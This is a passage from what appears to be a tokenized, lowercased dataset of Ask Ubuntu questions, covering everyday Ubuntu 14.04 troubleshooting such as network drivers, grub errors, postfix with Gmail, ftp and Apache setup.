multicast=yes wireless=ieee 802.11abgn resources : irq:16 memory : e0400000-e047ffff memory : e0480000-e048ffff *-network description : ethernet interface physical id : 1 logical name : eth0 serial : 72 : b1 : b1 : c1 : d8:46 size : 100mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=22-aug-2005 duplex=full firmware=asix ax88772b usb 2.0 ethernet ip=129.118.162.17 link=yes multicast=yes port=mii speed=100mbit/s warning : output may be incomplete or inaccurate , you should run this program as super-user . upd ( netstat-rn and tracepath -n 8 8 8 8 ) : user @ chrubuntu : ~ $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 129.118.163.254 0.0.0.0 ug 0 0 0 eth0 129.118.162.0 0.0.0.0 255.255.254.0 u 0 0 0 eth0 user @ chrubuntu : ~ $ tracepath -n 8.8.8.8 1 ? : [ localhost ] pmtu 1500 1 : 129.118.163.254 1.894ms 1 : 129.118.163.254 1.899ms 2 : 129.118.251.29 1.994ms 3 : 129.118.4.246 2.197ms 4 : 129.118.4.233 2.707ms asymm 5 5 : 129.118.4.238 2.932ms 6 : 12.249.227.125 10.755ms asymm 7 7 : no reply 8 : no reply 9 : no reply 10 : no reply 11 : no reply 12 : no reply 13 : no reply 14 : no reply 15 : no reply 16 : no reply 17 : no reply 18 : no reply 19 : no reply 20 : no reply 21 : no reply 22 : no reply 23 : no reply 24 : no reply 25 : no reply 26 : no reply 27 : no reply i tried to update the driver ( downloaded the latest one from asix website ) , but it seems i updated it to an older version ( 22-aug-2005 ) and it did not help . when i ping 8.8.8.8 all the packages are lost . exactly the same internet cord works on another computer ( desktop ) running standard ubuntu 14.04.it also works on the same chromebook when i use chrome os . any thoughts ?
492219	workspace-switching problem	press super+s . you should see your 4 workspaces . move your mouse , go over another workspace other than that which you were in . press super+s again . you should go to the workspace that had the mouse over it not back to the one where you started . i ca n't do that anymore . it goes back to the first workspace . how can i correct this ?
492221	can someone help me finish installing ubuntu on my partitioned hard drive ?	i currently have windows 8.1 and i had someone partition it for me and let me to download the newest ubuntu and install in on the partioned drive d : everything installed right , then after rebooting and loading into ubuntu the screen says ~ serious errors were found while checking the disk drive for / . ~ if i ignore , it then says ~ disk drive for /tmp is not ready yet or not present ~ h e l p ! ? ! ? thanks ! j
492222	ssh issue - no route to host	i have a server i use on my network for downloads from untrusted sources . it 's on a dmz with no allowed outbound connections to my internal lan . it also hosts a web front end by which i initiate and monitor downloads . i have rules on my internal lan that allow certain systems to initiate a connection to the web front end and ssh , so that i can pull files over from the download server after they 've been scanned for viruses . i have a media server on the internal network which i pull to . this was all working fine until i moved the server rack to a new location . after the move , i ca n't ssh into the download server from the media server , i get the error `` no route to host . '' oddly , the web front end is still accessible . other allowed systems inside the internal lan can ssh into the download server just find . all internal lan systems are on the same switch , vlan and firewall . it 's driving me up a wall , since all systems should be pulling the same route . i know this is n't super detailed information , but i 'm just looking for some pointers about what i should be looking at .
492224	laptop keyboard defected after updating ubuntu 14.04	after i updated latest ubuntu 14.04 update , my laptop 's keyboard started act funny . almost half of the letters are typing numbers instead for example ( p=* o=6 i=5 k=2 ) the strange thing is that when i connect wireless keyboard it works great . i thought it is a hardware defect but when i used live usb to start ubuntu the laptop keyboard was working good . any suggestions or ideas please ? !
492225	`` invalid magic number , unaligned pointer '' while attemping to install ubuntu alongside windows 7 on dell m3800	i am trying to install ubuntu 14.04 along with my windows 7 on dell m3800 . i used windows version of unetbootin as well as ubuntu-14.04-desktop-amd64.iso to make a usb drive for installing ubuntu . i get the following errors after i boot using the usb drive . invalid magic number unaligned pointer i formatted the usb drive in fat in a complete form in order for the unetbootin to copy the necessary files . i did my homework and searched online but unfortunately , i did not find something that solves my problem . could someone please help why i get this error and how i should solve it ? i would really appreciate it .
492227	how to switch workspaces in xubuntu by scrolling mouse wheel over the desktop ?	back in debian i used to switch workspaces in xfce just by rotating mouse wheel while the pointer is on any clear piece of the desktop ( one where i can see the wallpaper ) . but in xubuntu that does n't work , the workspaces can be switched only by scrolling over the workspace applet . how can i fix that behaviour ?
492229	software center says i 'm not authenicated	hi i 'm having troubles downloading software from the ubuntu software center . when i click install it says user not authenicated . and i do n't have the privilages to do this action . i was wondering how to you get authenticated . p.s . i am the only user on my computer .
492230	ca n't customize grub	a while ago my grub 's background turned black . i 'm not sure why . it kinda looks something like this : ( except that it 's grub 2 not this 1.98. whatever ) i think this issue is related to installing xfce but i 'm not sure . it did n't happen right after i installed it . anyway i installed grub customizer to get my normal grub back but it does n't seem to work on this `` new black grub '' . how can i restore my grub back ?
492232	ubuntu 14.04 error : no such partition	i deleted the ubuntu partition from my dual boot pc . now every time i start my pc the error appears ( `` no such partition entering rescue mode grub rescue '' ) . i ca n't even boot from my windows disc or ubuntu live cd . please help me fix it .
492234	thunderbird did n't got the structure of folders in my mail	iâve installed ubuntu 14.04 and configured thunderbird for my mail . my problem is thunderbird did n't got the structure of the folders in my mail . thunderbird got all the mails in the inbox folder . note : i 'm using gmail .
492236	how to get gnome environment while working in gnome	just some moments ago i installed kubuntu environment and switched to kubuntu but when i return to my gnome desktop environmenti can not get the pure desktop and many applications appear as if they are running on kubuntued gnome i want to get complete gnome environment while i use it can i get it ? here down is a screenshot of mozilla which also appears as that of kubuntu .
492241	how can i select a word or phrase with my cursor and have it defined ?	in os x i can select a word or phrase and define it , but that is not possible on my xubuntu 14.04 . is there a way i can do this ?
492244	network-manager not working in ubuntu 14.04	after installing ubuntu 14.04 in dell inspiron n5010 , my network manager disabling wifi is not working . it was fine in ubuntu 12.04 . i need help .
492251	brightness control command on `` startup applications '' is not working	on `` startup applications '' utility i added my suitable brightness to be configured each time os is launched . but it is not working at all . i am having to bear system 's very high default brightness . the command is : xrandr -- output lvds1 -- brightness 0.5 startup applications is very fine although . i have also added up firefox opening command which is opening it well . this brightness command is working from terminal . how do i make it work from startup app ? thanks in advance .
492253	enable old ubuntu startup/shutdown sounds in trusty tahr ?	i want to enable the sounds shown in this video ( i want the startup sound to play when any user sucsessfully logs in to the computer , and the shutdown sound to play when they shut it down . )
492254	ubuntu 14.04 periodical system image backup	i 'm running ubuntu 14.04 on a 32gb msata drive with a mechanical drive dedicated to windows and a data partition . i 've spent a lot of time setting up my install with things like android studio , itellij , mysql workbench , etc . i would like to be able to backup my entire msata drive to my data partition on set intervals and i would like the output to be installable from a usb drive . all of the tools i 've seen to make a bootable usb from a current install seem to have been depreciated , and i do n't just want a backup of my home folder . i know i could do something like this with clonezilla , but i want to schedule the backups to occur within the os , i do n't want to have to boot to a usb to make each backup . what are some tools i should look at ?
492256	why does k3b fail to write data dvds in ubuntu 14.04 ?	i am not yet very familiar with ubuntu , having only recently switched to the 14.04 lts version from windows . for the past few days i have been trying to burn a few movie files to make a data dvd with k3b , without success . with a blank dvd+rw , it first says `` preformatting rewritable disk '' , and then `` erasing failed '' , and ejects the disk . i then tried to burn an ordinary blank dvd . it started to `` flush cache '' ( what does this mean ? ) , but this never got under way , let alone completed . i need help from experienced people . is k3b not yet fully compatible with ubuntu 14.04 ? or do i have to tweak some settings of k3b ? i would also appreciate hearing from anyone facing similar problems with k3b . incidentally , i also tried brasero . it showed `` success '' but in actual fact there was nothing written on the disks .
492258	installing a firefox extension via terminal ?	is this possible ? ideally , i 'm trying to make script which will take files ( my extension backup files ) and replace or install them into other user 's computer , with all settings saved . is this possible . it 's ok even if i have to replace whole mozilla firefox directory , but it would be better to install only extension with all settings saved . i can not use gui , so i 'm looking for terminal only . for example a bash script and some files which i can give to customers and they would easy install it . is this possible ? the extensions i 'm trying to install this way on people 's computer is user agent overrider .
492259	ubuntu 14.04 lts theme	i 've install human-theme_0.39.2_all.deb but do n't see any effect , theme does n't added current listed themes in settings : appearance :
492266	how to bind the terminal command on firefox start ?	how to set a terminall command to run every time i start firefox ? i perfer terminal way , not gui . thanks !
492269	microsoft sculpt ergonomic desktop virtual joystick : how to remove it ?	i 've got microsoft sculpt ergonomic desktop ( keyboard + mouse ) and it creates major problems in some games with gamepad support as the nonexistent virtual joystick drives the input crazy . if i run rmmod joydev the problem is solved , but i 've got real gamepad and driving wheel and i want to use them as input controllers in games . so how can i disable only the virtual sculpt joystick without killing game controller support ? $ udevadm info /dev/input/js0 $ udevadm info -- attribute-walk /dev/input/js0 http : //i.imgur.com/saiqxar.png - jstest-gtk screenshot
492270	unable to connect to libvirt ( xen ) : libvirt-bin requires restart	i have the following packages installed on ubuntu 14.04 : xen-hypervisor-4.4-amd64 virt-manager libvirt-bin when i reboot ( to xen ) and start the virt-manager i get the following error : unable to connect to libvirt . internal error : libxenlight state driver is not active verify that : - a xen host kernel was booted - the xen service has been started unable to connect to libvirt . internal error : libxenlight state driver is not active and under 'details ' : verify that : - a xen host kernel was booted - the xen service has been started libvirt uri is : xen : /// traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1027 , in _open_thread self.vmm = self._try_open ( ) file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1009 , in _try_open flags ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 105 , in openauth if ret is none : raise libvirterror ( 'virconnectopenauth ( ) failed ' ) libvirterror : internal error : libxenlight state driver is not active however after i restart the libvirt-bin service i am able to connect to xen just fine after an expected socket error : sudo service libvirt-bin restart error polling connection 'xen : /// ' : internal error : client socket is closed what causes this behavior to appear and how to mitigate that ?
492276	revert accidental uninstall of windows	i followed some instructions to uninstall ubuntu on my hdd because i would like to reinstall ubuntu on an external hdd . i burned the image on a dvd . unfortunately when starting the computer with the dvd , windows was was completely uninstalled ( i was trying to uninstall ubuntu ) . therefore is it possible to go back and restore windows ?
492280	android studio not working - tools.jar classpath error	i have just downloaded the android studio and when i try to run ./studio.sh it gives me an error of `` 'tools.jar ' seems to be not in android studio classpath . please ensure java_home points to jdk rather than jre '' i have checked /usr/lib/jvm/java-1.7.0-openjdk-amd64 this folder `` java '' is there.. and i have set the environment variables in /etc/environment as java_home= '' /usr/lib/jvm/java-1.7.0-openjdk-amd64/ '' but still , the same error is coming , please help me out , after saving this file , if i check echo $ java_home - nothing comes and when i try source /etc/environment , it comes as java_home : command not found any help shall be highly appreciated , thanks in advance
492286	how to get macbuntu desktop environment	recently i saw a post on ask ubuntu regarding mac-buntu and i got curious about it and tried installing mac-buntu through this command in terminal sudo apt-get install macbuntu-desktop , but the result was shown saying no such package or directory is there any other way to install mac-buntu without actually creating a partition in your hard disk ? if yes then please let me know .
492289	how can i switch from easypeasy to ubuntu	i have an easypeasy install but as it is not being maintained , i would like to upgrade / switch to the normal ubunutu distributions . will that be possible just by editing sources.lst or will i need to backup my home folder , reformat and install ubuntu , then restore my home folder ?
492294	how to make ftp work on ubuntu 14.04	i have tried many answers but i was unable to make ftp work on my ubuntu 14.04.ftp works with localhost but not with other ip's whenever i try to use > ftp < ip-address > i get this error ftp : connect : connection refused i have installed ftpd and ftpd this is output of dpkg -l | grep 'ftp' ii ftp 0.17-28 amd64 classical file transfer client ii ftpd 0.17-34 amd64 file transfer protocol ( ftp ) server rc vsftpd 3.0.2-1ubuntu2.14.04.1 amd64 lightweight , efficient ftp server written for security also this is the output of iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination output of netstat -l | grep ftp tcp 0 0 * : ftp * : * listen please help me !
492295	powerpoint fullscreen crashes with playonlinux	i have installed playonlinux 4.0.14 on my ubuntu . i successfully installed powerpoint 2010 that launches after setting riched20.dll to native in the winecfg . however when i am putting a presentation in full screen the whole system crashed and a black screen is shown . does anyone know how to fix this ?
492296	which 14.04 version should i install ?	my specific question is that i have 3.9gb of ram , but i do n't have an amd processor . i have the intel i5 . do i install i386 , or the amd x64 version of 14.04 ? let me know if there are other specifics i should tell you guys .
492300	youtube video is not run on my firefox	i am using firefox and ubuntu . when i run my youtube video in firefox it now working.. it 's display this there is error an error occurred , please try again latter what can i do for this
492306	lxde directory menu not working	my os : lubuntu 14.04 lxpanel version : 0.6.1 installation works very well . but the `` directory menu `` on the taskbar does n't work . when i clicked on it , it show me a list including `` desktop , download , documents ... . `` , each has a submenu with `` open , open in terminal `` when i clicked on `` open '' or `` open in terminal '' , nothing happened . what could be the reason ? thanks in advance for answering ( :
492307	how to recover a lost text file ?	yesterday i was working on a text file in a drive that was mounted from a ntfs windows 8 partition . after running windows 8 and coming back to linux , i saw the file is gone , only to have a backup file with a bunch of unrelated content , apparently windows commands . since i worked on this file yesterday in linux ( gedit ) , how can i find it again ? remember the backup file is not the way to go . is there a folder where it could still reside ? thanks . tip : the suspicion is that when windows accessed the partition-in-question , it cleaned up anything that it did n't think was his . for example , the text file x is missing , but the backup remains . this backup contains , among other things , refers to a `` ccdmonitorservice '' . but the backup does not contain the original content .
492309	how to update adobe flash player	how can i update adobe flash player . my youtube video is not working .
492312	terminal command 'login ' fails with error message	coming from mac os x , there is a possibility for every ordinary user to open terminal and type in 'login ' to change to a different user account . when i do this with ubuntu , it provides the following error message : login : can not possibly work without effective root is there any way to remedy this ? which file do i need to edit and with what to enable the use of this command ( even for a standard user ) ?
492314	ubuntu failed to load - black screen	mine was a dualboot ubuntu/windows desktop . just then there was a black screen which appear after loading up the `` ubuntu '' symbol . then the screen prompted `` no input , entering sleeping mode '' . i wait for several minutes and no response . i reboot and got the same result . edit : pressing 'down ' arrow key show an flashing cursor on black screen . the screen go black after this splash screen . ========================================================= what i did today to the system : install a zsnes via apt-get tried to install fceux with this tutorial ( http : //maxolasersquad.blogspot.hk/2013/08/compiling-fceux-on-ubuntu.html ) . also i do n't it worked anyway . boot up windows and played it for a while . what i tried after the ubuntu failed to load : went to recovery mode , select the `` dpkg package recovery '' option , yes all the way . it did removed some packages . after reboot , the problem resume . tried to boot up windows and no problem . so most likely this is not hardware problem . any easy way to fix this ?
492319	ca n't update and ca n't open the manager	i have ubuntu 10.04 ( gnome ) and since the last update , i no longer can update or open the manager and many other programs . on the console when i try to update it says http : //ppa.launchpad.net/hakermania/format-junkie/ubuntu/dists/lucid/main/binary-i386/packages.gz 404 not found it also appears that i have 904 files outdated . i have tried so many commands , but any one works duo this error . can some one help me ?
492320	how to solve `` extra junk at end of file '' syntax error in `` 01autoremove-kernels '' file ? // invalid characters	i 've read how to solve `` extra junk at end of file '' when using apt ? and though it 's a similar problem , it apparently has a different cause since , looking at the contents of the file , unlike in the earlier q & a it seems far from obvious that adding apostrophes could solve the issue . an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( e : syntax error /etc/apt/apt.conf.d/01autoremove-kernels:1 : extra junk at end of file ) ' . this usually means that your installed packages have unmet dependencies . contents of problematic /etc/apt/apt.conf.d/01autoremove-kernels ( please note , however , that gedit complains about invalid characters ) : ../../../linux-headers-3.2.0-65/scripts/kconfig/streamline_config.pl\00\00\00\0‌​0\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\ ... ... ... ... .‌​
492322	audio and settings stop working after lastest updates on ubuntu 14.04	yesterday ( 2014-07-05 ) i upgrade my ubuntu ( upgrade/dist-upgrade ) and then audio and settings stop working . obs . : i use an usb headphone and hdmi : both does n't work anymore . i tried everything today , without success . below is the list of updates made ​​yesterday . sorry for my english .
492325	how can i create in qml a table of textinput boxes with background	how can i make a table with 6 rows 5 tables and 25 textinput boxes , with background . i 've tried almost everything to put an background to the textinput boxes , but still i could not get it right . my code for the textinput box is there : textinput { y : 20 ; font.pixelsize : 10 text : `` computador '' cursorvisible : true ; border.color : `` # c0c0c0 '' } how can i make them and put a background color to them ?
492327	% signs on deb package names ?	i just wanted to create a copy of ( /var/cache/apt/ ) archives directory and clean it to save some space . noticed % signs on certain packages ( ex-ffmpeg_6 % 3a0.8.12-1_amd64.deb ) . just wondered what that sign means on a package name . updated packages ? ! just curious to know . thank you for your time ...
492329	i ran minecraft.exe on wine and a black screen popped up	i ran minecraft.exe on my floppy with wine and a black window popped up . i saw log-in but it all was black you could only see the borders of login . how can i fix this error ?
492331	tar gzip every n files in a directory	i have a folder with 7,491 files in it . i 'd like to tar gzip these in batches of 100 , e.g . first 100 files > archive1.tar.gz files 101-200 > archive2.tar.gz files 201-300 > archive3.tar.gz is there a way to do this via the command line ?
492332	how to recovery files from lost a deleted partition	i 've deleted the wrong partition of my disk where is my ubuntu , and i have important files there , is there any way to recovery them ?
492334	can i use ssd for system and hdd for /home partition w/o problems in future ?	my first question here . i 'm relatively new to linux . pretty much i 've been using windows since 95 release , so i 'm a bit confused as you may have guessed . it 's not really ubuntu-specific question ( well it kinda is ) , but i believe that this question belongs here . so , on windows i would simply make a 180gb c : / partition from my ssd and then i 'd make ~500gb d : / partition for games/music and ~1tb e : / partition for programming/game development/drawing etc . on linux i figured out that i could use ssd for system ( / mount point ) and swap ( i heard that it 's recommended that swap size is 1.5 or 2 times as much as ram , so i 've spent 32gb of ssd for swap ) and my hdd for my own files ( /home mount point ) . so far everything works fine , but i 've found one weird problem : i ca n't resize my /home partition with free space i have available on my hdd . i simply boot up ubuntu live cd , run gparted and there i can only shrink this partition . it 's weird , because i have ~hundred gb of free space on this hdd , but that 's optional part of this question and if somebody could answer it i 'd be grateful , but it 's not necessary . my real question is as in the title : can i use such setup as i described or could mixing up ssd and hdd or having swap on ssd cause any problems in future ? i 'm using ubuntu 14.04 . as requested , here is output from sudo parted -l : model : ata st1500dm003-9yn1 ( scsi ) disk /dev/sda : 1500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 3 107gb 760gb 652gb primary ntfs 1 760gb 1500gb 740gb extended boot 5 760gb 1500gb 740gb logical ext4 model : ata intel ssdsc2bw18 ( scsi ) disk /dev/sdb : 180gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 32,8gb 32,8gb primary 2 32,8gb 180gb 147gb extended 5 32,8gb 180gb 147gb logical ext4
492337	how to load blackgold 3620 pcie dvb-t2 tv tuner driver in ubuntu 14.04	i have been trying to get my blackgold 3620 dvb-t2 pcie tv tuner to work in ubuntu . i have downloaded the open source driver provided by blackgold here http : //shop.blackgold.tv/support/current-drivers . i have tried to follow the `` build instructions.pdf '' provided in the documentation but have so far been unable to get it working . here are a few of the issues i 've come across : when configuring the kernel options in `` make menuconfig '' i am unable to select the `` m '' option , and can only select or deselect items ( `` y '' or `` n '' ) . so i ca n't recreate the menuconfig in the documentation . when doing `` sudo make '' on the makefile in `` bgt-linux-pcie-drv/v4l '' it throws an error saying it ca n't find /lib/modules/3.3.0-30-generic . this makes no sense to me as the documentation states the driver was tested with kernel 3.9.3 and i am running 3.13.0-30-generic . so why would it be asking for 3.3.0-30-generic ? to get around this i simply made a symbolic link to my current kernel directory with the name `` 3.3.0-30-generic '' . i am then able to run `` sudo make '' without issue . this generates a module called `` dvb-pll.ko '' . however , after doing a lot of reading online , particularly on linuxtv.org , i think i am supposed to have a dvb-pll.ko and dvb-core.ko module , among others . i have tried to load the `` dvb-pll.ko '' module but it does n't seem to do anything . the documentation is then quite vague about what to do with the ../v4l/firmware/ directory . i took it as i need to copy all files and directories within firmware to `` /lib/firmware '' , except makefile ( as i did n't want to overwrite the one already in /lib/firmware ) and overwrite/merge all files and directories . if i then do a `` sudo make install '' in `` ../v4l/ '' the `` dvb-pll.ko '' module is loaded . however , as stated above i should have more modules loaded as referenced in the `` bgt3620-validation.pdf '' document and here : `` http : //www.brumster.com/articles.php ? article_id=7 '' . throughout this whole process i have not had any dvb devices appears in `` /dev '' and have no `` /dev/dvb/ '' directory . i know i must be doing something wrong . i am not very familiar with linux drivers . my blackgold 3620 pci-e dvb-t2 tv tuner card works fine in windows . having it work in linux would mean i could ditch windows for good on my media pc .
492338	configuring gmail with postfix	i am trying to configure gmail with postfix so i can sent emails via command line . this is mine /etc/postfix/main.cf alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all mailbox_size_limit = 0 mydestination = mosquito-k56cb , localhost.localdomain , localhost myhostname = mosquito-k56cb mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 readme_directory = no recipient_delimiter = + relayhost = [ smtp.gmail.com ] :587 smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_tls_cafile = /etc/postfix/cacert.pem smtp_tls_policy_maps = hash : /etc/postfix/tls_policy smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes i was using this guide : https : //rtcamp.com/tutorials/linux/ubuntu-postfix-gmail-smtp/ i created my /etc/postfix/sasl_passwd with correct login and password entries . and when i do : echo `` test mail from postfix '' | mail -s `` test postfix '' myemail @ gmail.com i do n't receive anything . what can be wrong here ? my /var/log/mail.log : http : //pastebin.com/ncnfjkx6
492340	how to execute a terminal command every time the firefox windows closes	i need to execute this : rm -rf ~/.wine-pipelight/* ; rm -rf ~/.wine-pipelight/./ . * ; cp -a ~/viewright_backup/ . ~/.wine-pipelight every time the firefox window closes . but not necessarily when all the windows closed , but on every window that is closed . for example , if i have one firefox window and one firefox pop-up window . if i close at least one windows , i want to execute this command . is this possible ? thanks !
492342	i ca n't delete files on flashdisk after sync with unison-gtk	i use unison-gtk for folder sync with my flashdisk . after sync i ca n't delete my files in my flashdisk .
492347	installing ubuntu on hp/compaq tc4200 from usb issues	first post in forum . i have tried on several different systems throughout my computing history to run/boot/install lynux distros however , i have never had any luck . whilst i am not a developer or other type of it professional , i am not a computer novice so this kind of thing should n't be out of my ability range . anyhow : the tc4200 is a tablet/laptop hybrid and as such it does not have a cd drive and nor do i have a usb one . i therefore made a bootable floppy/drive using universal usb installer . the drive boots fine but takes me straight to an install menu when i would have preferred to try it first . this installer is more akin to an old dos installer . anyway i thought i would just get on with it and cycled through the options . as it started installing it threw an error saying something along the lines of `` cd drive error , no cd drive found '' or `` cd driver error '' . it then presents you with some options for detecting or manually finding a driver or skipping it altogether . when skipped it wo n't allow the install to continue because no cd drive is present . could anyone help please ? thanks graham
492351	ubuntu is not recognizing android phone	i installed ubuntu 14.04 lts , android sdk , adb and some other stuff to develop android app on ubuntu but phone is not recognizing by computer . adb is working and phone debug settings are ok. how can i fix this ? edit : i had set up phone but not working ( http : //developer.android.com/tools/device.html ) device is samsung galaxy s4 v4.2.2 .
492354	how to disable hibernation on ubuntu 14.04 or restore to its default settings ?	i re-enabled hibernation on 14.04 but i 'm not happy how it works . i want to restore how it was , without hibernation button . any help , please .
492357	is there a command to pause the native ubuntu sound player ?	so under my volume drop down menu , i have spotify , rhythmbox and vlc : here i can pause and play the various different applications . my question is , is there a command to pause the one that is currently playing , e.g . i could set up a short cut to pause whichever was playing . this is mainly because spotify does n't have command options as far as i can tell , and i would like to pause it using blue proximity when i get up ?
492358	video not playing in firefox	my youtube video is not displaying in firefox . i want to uninstall firefox and install it again . how can i do . please help me do this..
492359	using ubuntu 14.04 within a light version ui	i am using ubuntu 14.04 and the laptop is from 2008 and it does not have good staff , so i believe that i should use lubuntu or xubuntu but i learnt that the default software of them are really different from ubuntu . i just ca n't leave defaults of ubuntu . but the interface is not really neccessary for me . so i was thinking maybe i can change the ui which will use less memory and proccessor things ... so can anyone explain me if i can change `` only '' the ui of ubuntu 14.04 for faster computer experience ? if so , how to that ? i have ; 2,0 gib ram intel® core™2 duo cpu t5450 @ 1.66ghz × 2 intel® 965gm x86/mmx/sse2 graphic card thanks advance .
492361	are there commands to control the spotify for linux preview ? ( e.g . pause ) ?	i am trying to be able to play , pause , chose next track or previous track from command line , but unfortunately no one seems to know how to do this ( i have goggled repeatedly ) . i need it to be a command so that i can use it with blue proximity , so pause when i walk away . are there any commands for this ?
492365	can not log in ubuntu 12.04 lts	i just started to upgrade ubuntu 12.04 to 14.04 . installation was not successful . after restart i can see the login page with my username and guest but when i fill login details nothing happens . same login window appears again . please help .
492368	open tor-browser	i 've installed the tor-browser via command line . i 'm now searching for the program using ubuntu search but it does n't show up . i 've also tried calling the browser via command line . how can i open it now that it 's installed ?
492369	untrusted package errors when installing okular and ace stream	whenever i try to install a new application , i get 'untrusted package errors ' . for example , at the moment i 'm trying to install 'okular ' , but i keep getting an untrusted package error upon downloading which details the source of the error as : libqimageblitz4 i 'm also trying to download ace stream ( at the moment , just the engine ) , but likewise , i keep getting an untrusted package error , this time detailed as : acestream-engine python-apsw python-m2crypto can anyone please help me ?
492373	ubuntu settings mess up after trying kubuntu	i am trying kubuntu on my computer , but then i come back again to unity and when i do , configuration keeps some of kde 's settings : general window and indicator fonts are smaller and thinner ; they 're also black with dark background . several indicator icons are missing , e.g . keyboard input , messaging available status , and calendar icon . others are switched to kde style , e.g . wifi , online status , and libreoffice icons . and i noticed the keyboard shortcut for switching input , is still set but does n't work . i 'm wondering how i can switch these back . maybe each at a time , or maybe all at once . thanks and have a good day . this is ubuntu 14.04 .
492374	how to enable lubuntu lightdm dinamic autologin ( sorry for my english )	hi i freshly installed lubuntu 14.04 i disabled lightdm autostarting by editing /etc/default/grub well.. i got some problems '' sudo service lightdm start '' is working but startx command always freezes at `` loading extensions glx when i turn on computer i have to login console and when i type `` sudo service lightdm start '' i have to input password again and finally when lightdm is started i have to login again that 's very bothering me what i want to do is when i login into console it should be possible to login into xwindows directly with currentuser who logined console linuxubuntu gonny95 is online now report this post
492375	distorted sound unless pavucontrol is open ?	seems as though there ought to be a simple solution to this : my sound comes through a jack in the back of a samsung hdmi monitor . if pavucontrol ( pulse audio volume control ) is running ( if the window/dialog box is open ) then the sound is flawless . as soon as i close it , the sound is badly distorted . open it ? perfect . close it ? distorted . any ideas ? all my google searches are dead ends . seems like there must be a file that needs to be tweaked somewhere ? whatever settings pavucontrol is using , are perfect ; but are `` dis-invoked '' as soon as i close the app ? using 14.04 .
492377	'update information is outdated ' related to failed installation of apt-fast	i recently subscribed to linux format , and in the aug. 2014 issue ( 'fix ubuntu ' ) they recommended apt-fast to install software faster : $ sudo add-apt-repository ppa : apt-fast/stable $ sudo apt-get update $ sudo apt-get install apt-fast the installation failed , and now i 'm getting the red triangle stating my update information is outdated ( with two 404 errors related to apt-fast ) . also , it says i have no internet connection when trying to switch update servers . i installed synaptic to look for the failed install of apt-fast to delete it , but it 's not listed anywhere . i also checked /etc/apt/sources.list , but there was n't any reference to apt-fast that i could find . so my question is how do i completely delete apt-fast ( even if it failed to install ) , and will that fix the update issue ? i 'm using ubuntu 14.04 on an asus x201e netbook . thanks very much .
492378	how to install vaio-control-center from source ?	i have a problem about turning off keyboard backlight that i asked here with no useful answers . after searching on internet i find a package for vaio control center and downloaded it from here , i do n't know how to install it . this is the output of trying one solution : user @ xxxxpc : ~/vaio-control-center-0.1 $ ls compile makefile run vaio-control-center vcc copying moc_main_window.cpp ui_main_window.h vaio-control-center.pro user @ xxxxpc : ~/vaio-control-center-0.1 $ ./compile make : *** no rule to make target `/usr/share/qt/mkspecs/linux-g++-64/qmake.conf ' , needed by `makefile ' . stop . user @ xxxxpc : ~/vaio-control-center-0.1 $ ./run ./run : 3 : ./run : ./vaio-control-center : not found user @ xxxxpc : ~/vaio-control-center-0.1 $ updated i tried also with @ pandya 's suggestion from here . and the output is as follows : root @ user-pc : / # cd /home/user/vaio-f11-linux.control-center root @ user-pc : /home/user/vaio-f11-linux.control-center # ls compile copying resource.qrc run sony-acpid vaio-control-center.pro vcc root @ user-pc : /home/user/vaio-f11-linux.control-center # ./compile -su : ./compile : permission denied root @ user-pc : /home/user/vaio-f11-linux.control-center # sudo ./compile sudo : ./compile : command not found root @ user-pc : /home/user/vaio-f11-linux.control-center # gksudo ./compile root @ user-pc : /home/user/vaio-f11-linux.control-center # < -- -- - nothing happened here root @ user-pc : /home/user/vaio-f11-linux.control-center # ./run -su : ./run : permission denied root @ user-pc : /home/user/vaio-f11-linux.control-center # sudo ./run sudo : ./run : command not found root @ user-pc : /home/user/vaio-f11-linux.control-center # gksudo ./run root @ user-pc : /home/user/vaio-f11-linux.control-center # < -- -- - nothing happened here root @ user-pc : /home/user/vaio-f11-linux.control-center # and after running that i did n't see any affect on keyboard backlight .
492379	does ubuntu install on windows 8.1 with dual boot options	i want to install ubuntu on an hp laptop with windows 8.1 installed . does the ubuntu installer allow the dual boot setup ?
492383	can i copy the ubuntu on my computer to a flash drive ?	i have ubuntu on my computer already , but is it possible to copy the whole operating system to a flash drive ? i wish to boot that os , with all the files on it , to a seperate computer .
492384	download from youtube using youtube-dl	how to use youtube-dl to download a given playlist from youtube but starting with a given ( using ubuntu ) video , for example i want to download youtube playlist by starting from the 5th video and not the first one . any help would be appreciated .
492390	making apache secure on ubuntu 14.04	i am wanting to host a small site at home and have installed apache etc like this : sudo apt-get update sudo apt-get install tasksel sudo tasksel install lamp-server that all worked and everything is up and running . now i am used to working with xampp to develop and i did not want to use that live as many references said it was not very secure . so my question is , now that i have apache/php & mysql installed by the above method ; how is the level of security by default ? is there ways to make it more secure and perhaps a check-list or run-down of any changes that might be recommended ? many thanks , loving ubuntu ! clarification : the lamp server would be a live site , not one in development .
